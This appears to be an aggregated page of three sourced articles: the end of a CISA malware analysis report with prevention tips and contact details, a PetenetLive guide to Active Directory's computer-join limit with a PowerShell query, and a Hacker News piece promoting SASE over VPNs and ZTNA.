  10. Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  11. Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  12. Scan all software downloaded from the Internet prior to executing.
  13. Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

  1. 1-888-282-0870
  2. CISA Service Desk (UNCLASS)
  3. CISA SIPR (SIPRNET)
  4. CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

  1. Web: https://malware.us-cert.gov
  2. E-Mail: submit@malware.us-cert.gov
  3. FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Source :
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

You Have Exceeded the Maximum Number of Computer Accounts

The following error occurred attempting to join the domain {domain-name}

You computer could not be joined to the domain, You have
exceeded the maximum number of computer accounts you are
allowed to create in this domain. Contact your system|
administrator to have this limit reset or increased.

To be honest there’s no way I can think of to reset that limit, (short of deleting and recreating your domain user account!) So what’s going on? Well every authenticated domain user has the RIGHT to join a computer to the domain, and the amount of computers they can join is limited to 10 (ten).

Exceptions / Users Not Affected

Members of the domain admins group, and users that have been delegated the right to create a computer object are exempt this limit. 

Solution Option 1 – Use an Administrative Account

Pretty straight forward, the easiest way to avoid this is to add computers to the domain using an account that’s a member off the Domain Admins Group.

Solution Option 2 – Raise The Limit From 10

This limit is set at a Domain level, i.e. it’s not set on a particular user, so you have to raise the limit for ALL Users. To do this log onto a domain controller and launch Adsiedit.msc > Connect To > Default Naming Context > OK.

Select CN={Your Domain} > Properties > Locate ms-DS-MachineAccountQuota > Edit > Change the value from 10 to something greater.

Solution Option 3 – Delegate Create Computer Object Right

Locate the OU (or container) that your new computer objects get added to, (I say container because ‘Computers’ is NOT an OU) > Right Click > Delegate Control > Next > Add your domain user > Next > Create a custom task > Next.

Only the following object in the folder > Tick: Computer Objects > Tick: Create selected object in this folder > Next > Tick: Property specific > Tick: Read All Properties > Next > Finish

Solution Option 4 – Pre-Stage Computer Objects in Active Directory

Not very scalable, but you can pre-create the computer object before the computer is joined to the Domain, (providing you know its computer-name / host-name). This can be done in Active directory Users and Computers.

Then you can simply join the computer to the domain.

How Does This Work

When a computer is joined to a domain a few things happen, the account you are using is checked, if it’s a normal, (not delegated or non domain admin) user, then the SID (Security Identifier) of that user is stamped on the COMPUTER object in a value called ms-DS-CreatorSID 

What does NOT happen: There is NOT value on the USER object that increments by one for each machine joined to the domain, the ONLY reference is on the COMPUTER object. Yes this seems inefficient, but there we go that’s how it works.

If the user has delegated rights to create computer objects, or is a member of domain admins then, ms-DS-CreatorSID is left empty, (if you query it using PowerShell or programatically it will return ‘null’).

Finding Out Who Joined a Computer to The Domain

Because of the way this is stamped on the computer, and not the user, then if you want to find out how many computers a particular user, or users, have added it’s not straight forward! If it’s something that’s happened recently you can look on your domain controllers in the security log for Event 4741.

Or if you need to do something complicated, then scripting is your friend!

Getting a List of Computers Joined to a Domain (By User)

Use the following PowerShell, (this is one command if it gets wrapped after you copy/paste it).

Get-ADComputer -Filter * -Properties ms-DS-CreatorSID | Where-Object -FilterScript { $_."ms-DS-CreatorSID" -ne $Null } | Format-Table -AutoSize -Property Name,@{Label='User';Expression={(New-Object System.Security.Principal.SecurityIdentifier($_."mS-DS-CreatorSID".Value)).Translate([System.Security.Principal.NTAccount]).Value}}

Like so;

Source :
https://www.petenetlive.com/KB/Article/0001536

Effective Business Continuity Plans Require CISOs to Rethink WAN Connectivity

As more businesses leverage remote, mobile, and temporary workforces, the elements of business continuity planning are evolving and requiring that IT professionals look deep into the nuts and bolts of connectivity.

CISOs and their team members are facing new challenges each and every day, many of which have been driven by digital transformation, as well as the adoption of other productivity-enhancing technologies.

A case in point is the rapidly evolving need to support remote and mobile users as businesses change how they interact with staffers.

For example, the recent COVID-19 crisis has forced the majority of businesses worldwide to support employees that work from home or other remote locations.

Many businesses are encountering numerous problems with connection reliability, as well as the challenges presented by rapidly scaling connectivity to meet a growing number of remote workers.

Add to that security and privacy issues, and it becomes evident that CISOs may very well face what may become insurmountable challenges to keep things working and secure.

It is the potential for disruption that is bringing Business Continuity Planning (BCP) to the forefront of many IT conversations. What's more, many IT professionals are quickly coming to the conclusion that persistent WAN and Internet connectivity prove to be the foundation of an effective business continuity plan.

VPNs are Failing to Deliver

Virtual Private Networks (VPNs) are often the first choice for creating secure connections into a corporate network from the outside world.

However, VPNs have initially been designed to allow a remote endpoint to attach to an internal local area network and grant that system access to data and applications stored on the network.

For occasional connectivity, with a focus on ease of use.

Yet, VPNs are quickly beginning to show their limitations when placed under the demand for supporting a rapidly deployed remote workforce.

One of the most significant issues around VPNs comes in the context of scalability; in other words, VPNs can be complicated to scale quickly.

For the most part, VPNs are licensed by connection and are supported by an appliance on the network side to encrypt and decrypt traffic. The more VPN users that are added, the more licenses and processing power that is needed, which ultimately adds unforeseen costs, as well as introducing additional latency into the network.

Eventually, VPNs can break under strain, and that creates an issue around business continuity. Simply put, if VPNs become overwhelmed by increased traffic, connectivity may fail, and the ability for employees to access the network may be impacted, the concept of business continuity suffers as a result.

VPNs are also used for site to site connections, where the bandwidth may be shared not only from a branch office to a headquarters office but also with remote users. A situation such as that can completely derail an organization's ability to do business if those VPNs fail.

Perhaps an even bigger concern with VPNs comes in the form of cybersecurity. VPNs that are used to give remote users access to a network are only as reliable as the credentials that are given to those remote users.

In some cases, users may share password and login information with others, or carelessly expose their systems to intrusion or theft. Ultimately, VPNs may pave the way for attacks on the corporate network by allowing bad actors to access systems.

ZTNA Moves Beyond VPNs

With VPN technology becoming suspect in the rapid expansion of remote workforces, CISOs and IT pros are looking for alternatives to ensure reliable and secure connections into the network from remote workers.

The desire to bridge security and reliability is driven by continuity, as well as operational issues. CISOs are looking to keep costs down, provide a level of security, without compromising performance, and still meet projected growth.

Many enterprises thought that the answer to the VPN dilemma could be found in SDP (Software Defined Perimeters) or ZTNA (Zero Trust Network Access), two acronyms that have become interchangeable in the arena of cybersecurity.

ZTNA has been built for the cloud as a solution that shifted security from the network to the applications. In other words, ZTNA is application-centric, meaning that users are granted access to applications and not the complete network.

Of course, ZTNA does much more than that. ZTNA can "hide" applications, while still granting access to authorized users. Unlike VPNs, ZTNA technology does not broadcast any information outside of the network for authentication, whereas VPN concentrators sit at the edge of the network for all to see, making them a target for malicious attackers.

What's more, ZTNA uses inside-out connections, which means IP addresses are never exposed to the internet. Instead of granting access to the network like a VPN, ZTNA technology uses a micro-segmentation approach, where a secure segment is created between the end-user and the named application.

ZTNA creates an access environment that provides private access to an application for an individual user, and only grants the lowest level of privileges to that user.

ZTNA technology decouples access to applications from access to the network, creating a new paradigm of connectivity. ZTNA based solutions also capture much more information than a VPN, which helps with analytics and security planning.

While a VPN may only track a device's IP address, port data, and protocols, ZTNA solutions capture data around the user identity, named application, latency, locations, and much more. It creates an environment that allows administrators to be more proactive and more easily consume and analyze the information.

While ZTNA may be a monumental step forward from legacy VPN systems, ZTNA solutions are not without their own concerns. ZTNA solutions do not address performance and scalability issues and may lack the core components of continuity, such as failover and automated rerouting of traffic.

In other words, ZTNA may require those additional third-party solutions to be added to the mix to support BCP.

Resolving ZTNA and VPN issues with SASE

A newer technology, which goes by the moniker of SASE (Secure Access Service Edge), may very well have the answer to the dilemmas of security, continuity, and scale that both ZTNA and VPNs introduce into the networking equation.

The Secure Access Service Edge (SASE) model was proposed by Gartner's leading security analysts, Neil MacDonald, Lawrence Orans, and Joe Skorupa. Gartner presents SASE as a way to collapse the networking and security stacks of SD-WANs into a fully integrated offering that is both easy to deploy and manage.

Gartner sees SASE as a game-changer in the world of wide-area networking and cloud connectivity. The research house expects 40% of enterprises to adopt SASE by 2024. However, a significant challenge remains, networking and cybersecurity vendors are still building their SASE offerings, and very few are actually available at this time.

One such vendor is Cato Networks, which offers a fully baked SASE solution and has been identified as one of the leaders in the SASE game by Gartner.

SASE differs significantly from the VPN and ZTNA models by leveraging a native cloud architecture that is built on the concepts of SD-WAN (Software-Defined Wide Area Network). According to Gartner, SASE is an identity-driven connectivity platform that uses a native cloud architecture to support secure connectivity at the network edge that is globally distributed.

SASE gives organizations access to what is essentially a private networking backbone that runs within the global internet. What's more, SASE incorporates automated failover, AI-driven performance tuning, and multiple secure paths into the private backbone.

SASE is deployed at the edge of the network, where the LAN connects to the public internet to access cloud or other services. And as with other SD-WAN offerings, the edge has to connect to something beyond the four walls of the private network.

In Cato's case, the company has created a global private backbone, which is connected via multiple network providers. Cato has built a private cloud that can be reached over the public internet.

SASE also offers the ability to combine the benefits of SDP with the resiliency of an SD-WAN, without introducing any of the shortcomings of a VPN.

Case in point is Cato's Instant Access, a clientless connectivity model that uses a Software-Defined Perimeter (SDP) solution to grant secure access to cloud-delivered applications for authorized remote users.

Instant access offers multi-factor authentication, single sign-on, least privileged access, and is incorporated into the combined networking and security stacks. Since it is built on SASE, full administrator visibility is a reality, as well as simplified deployment, instant scalability, integrated performance management, and automated failover.

Cato Networks' Remote Access Product Demo

In Cato's case, continuous threat protection keeps remote workers, as well as the network, safe from network-based threats. Cato's security stack includes NGFW, SWG, IPS, advanced anti-malware, and Managed Threat Detection and Response (MDR) service. Of course, Cato isn't the only player in the SASE game; other vendors pushing into SASE territory include Cisco, Akamai, Palo Alto Networks, Symantec, VMWare, and Netskope.

SASE Address the Problems of VPNs, ZTNA -- and More

With VPNs coming up short and ZTNA lacking critical functionality, such as ease of scale and performance management, it is quickly becoming evident that CISOs may need to take a long hard look at SASE.

SASE addresses the all too common problems that VPNs are introducing into a rapidly evolving remote work paradigm, while still offering the application-centric security that ZTNA brings to the table.

What's more, SASE brings with it advanced security, enhanced visibility, and reliability that will go a long way to improving continuity, while also potentially lowering costs.

Source :
https://thehackernews.com/2020/05/rethink-wan-connectivity.html